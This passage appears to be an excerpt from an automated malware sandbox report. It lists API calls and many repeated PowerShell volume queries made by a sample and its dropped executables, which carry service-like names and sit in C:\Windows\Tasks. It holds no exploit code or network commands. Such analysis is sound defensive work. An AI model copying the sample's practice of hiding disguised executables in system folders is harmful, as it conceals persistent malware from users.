Source: migrate.exe, 0000001A.00000003.1846671612.000000000778E000.00000004.00000020.00020000.00000000.sdmp, IntelConfigService.exe, 00000027.00000000.1896368978.00007FF7555AB000.00000002.00000001.01000000.0000000B.sdmp, Superfetch.exe, 00000037.00000000.1912951028.00007FF6384CB000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Code function: 0_2_0088F654 cpuid 0_2_0088F654
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_0088AF0F
Source: C:\ProgramData\migrate.exe Code function: GetLocaleInfoW,GetNumberFormatW, 26_2_0012AF0F
Source: C:\Windows\Tasks\Wmiic.exe Code function: GetLocaleInfoA, 31_2_00000001400245E8
Source: C:\Windows\Tasks\Wmiic.exe Code function: GetLocaleInfoA, 37_2_00000001400245E8
Source: C:\Windows\Tasks\Wrap.exe Code function: GetLocaleInfoW, 42_2_00007FF726D107E4
Source: C:\Windows\Tasks\Wrap.exe Code function: EnumSystemLocalesW, 42_2_00007FF726D070EC
Source: C:\Windows\Tasks\Wrap.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 42_2_00007FF726D100E4
Source: C:\Windows\Tasks\Wrap.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 42_2_00007FF726D10598
Source: C:\Windows\Tasks\Wrap.exe Code function: try_get_function,GetLocaleInfoW, 42_2_00007FF726D0766C
Source: C:\Windows\Tasks\Wrap.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 42_2_00007FF726D10B18
Source: C:\Windows\Tasks\Wrap.exe Code function: EnumSystemLocalesW, 42_2_00007FF726D10500
Source: C:\Windows\Tasks\Wrap.exe Code function: EnumSystemLocalesW, 42_2_00007FF726D10430
Source: C:\Windows\Tasks\Wrap.exe Code function: GetLocaleInfoW, 42_2_00007FF726D109EC
Source: C:\Windows\Tasks\Wrap.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 42_2_00007FF726D1093C
Source: C:\Windows\Tasks\1.exe Code function: GetLocaleInfoW,GetNumberFormatW, 60_2_003FAF0F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
